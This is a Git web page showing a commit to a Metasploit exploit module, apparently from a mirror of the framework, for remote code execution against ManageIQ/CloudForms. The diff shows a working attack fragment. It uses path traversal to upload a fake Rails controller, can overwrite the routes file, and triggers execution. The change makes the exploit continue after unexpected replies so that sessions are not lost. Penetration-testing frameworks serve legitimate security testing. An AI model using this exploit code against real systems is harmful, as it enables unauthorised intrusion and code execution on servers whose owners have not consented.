infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #2 from jvazquez-r7/review_2745 

Fix cfme_manageiq_evm_upload_exec according to chat with @rcvalle
bug/bundler_fix
Ramon de C Valle 2013-12-18 09:58:31 -08:00
parent 819236c6ec ec64382efc
commit 6487d677f9
1 changed files with 16 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb
View File

@ -8,6 +8,7 @@ require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize
super(
@ -93,15 +94,27 @@ class Metasploit4 < Msf::Exploit::Remote
print_status("Sending fake-controller upload request to #{target_url('agent', 'linuxpkgs')}...")
res = upload_file("../../app/controllers/#{controller}_controller.rb", data)
fail_with(Failure::Unknown, 'No response from remote host') unless res and res.code == 500
fail_with(Failure::Unknown, 'No response from remote host') if res.nil?
register_files_for_cleanup("app/controllers/#{controller}_controller.rb")
# According to rcvalle, all the version have not been checked
# so we're not sure if res.code will be always 500, in order
# to not lose sessions, just print warning and proceeding
unless res and res.code == 500
print_warning("Unexpected reply but proceeding anyway...")
end
if datastore['ROUTES']
data = "Vmdb::Application.routes.draw { root :to => 'dashboard#login'; match ':controller(/:action(/:id))(.:format)' }\n"
print_status("Sending routing-file upload request to #{target_url('agent', 'linuxpkgs')}...")
res = upload_file("../../config/routes.rb", data)
fail_with(Failure::Unknown, 'No response from remote host') unless res and res.code == 500
fail_with(Failure::Unknown, 'No response from remote host') if res.nil?
# According to rcvalle, all the version have not been checked
# so we're not sure if res.code will be always 500, in order
# to not lose sessions, just print warning and proceeding
unless res and res.code == 500
print_warning("Unexpected reply but proceeding anyway...")
end
end
print_status("Sending execute request to #{target_url(controller, action)}...")